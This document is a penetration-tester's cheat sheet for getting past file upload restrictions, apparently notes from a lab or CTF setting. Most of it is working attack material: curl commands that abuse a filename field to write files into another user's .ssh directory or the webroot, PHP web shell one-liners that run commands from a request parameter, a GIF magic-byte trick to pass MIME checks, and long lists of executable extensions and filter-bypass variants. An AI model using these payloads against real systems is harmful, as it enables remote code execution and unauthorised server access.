File Upload bypass
Upload file with curl
echo "szalek" > poc.txt
# plain upload; note that "filename" is sent as a separate form field, so check whether the server builds the destination path from it
curl -F 'file=@/home/kali/workspace/poc.txt' -F 'filename=poc.txt' $IP:33414/file-upload
# if the server trusts the supplied filename, an absolute path (or ../) gives arbitrary file write: a key into a user's .ssh/, a shell into the webroot
curl -F 'file=@/home/kali/workspace/poc.txt' -F 'filename=/home/alfredo/.ssh/poc.txt' $IP:33414/file-upload
curl -F 'file=@/home/kali/workspace/poc.txt' -F 'filename=/var/www/html/poc.txt' $IP:33414/file-upload
Other
Metadata with exiftool: write the PHP payload into an image tag (e.g. Comment) of a real image, so the file keeps a valid header and passes getimagesize()/MIME checks; it still needs an executable extension or a handler mapping to run.
Content
GIF89a                  (image magic bytes on the first line so MIME sniffing / getimagesize() reports a GIF; the PHP follows on the next line)
<?php $a=system($_GET['cmd']); echo $a;?>
<?php system('whoami'); ?>
<?php exec('whoami'); ?>
<?php passthru('whoami'); ?>
<?php shell_exec('whoami'); ?>
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
<?php preg_replace('/.*/e', 'system("whoami");', ''); ?>          (/e evaluates the replacement as PHP; removed in PHP 7.0, legacy targets only)
Filters
evil.png;.php
evil.gif.php
evil.gif.php5
evil.php;gif
evil.config      (server config files: not executed themselves, but if they can be uploaded they can map another extension to the script handler)
evil.htaccess
Other PHP extensions (often mapped to the same handler as .php):
php3
php4
php5
php7
pht
phtm
phtml
phar
phps
PHP: .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .pht, .phtm, .phtml, .pgif, .shtml, .htaccess, .phar, .inc
ASP: .asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml
Jsp: .jsp, .jspx, .jsw, .jsv, .jspf, .wss, .do, .action
Coldfusion: .cfm, .cfml, .cfc, .dbm
Flash: .swf
Perl: .pl, .cgi
Erlang Yaws Web Server: .yaws
Bypass file extensions checks
- Try upper cases: pHp, .pHP5, .PhAr ... (defeats case-sensitive blacklists)
- Add a valid extension before the execution extension: file.png.Php5
- Add special characters at the end (trailing dot, space, %20, %0a ...). Use Burp Suite Intruder to iterate through them.
- Trick the server-side extension parser: double the extension (file.php.png runs on Apache hosts whose AddHandler matches .php anywhere in the name) or put junk between the extensions, e.g. a null byte (file.php%00.png, works on PHP < 5.3.4).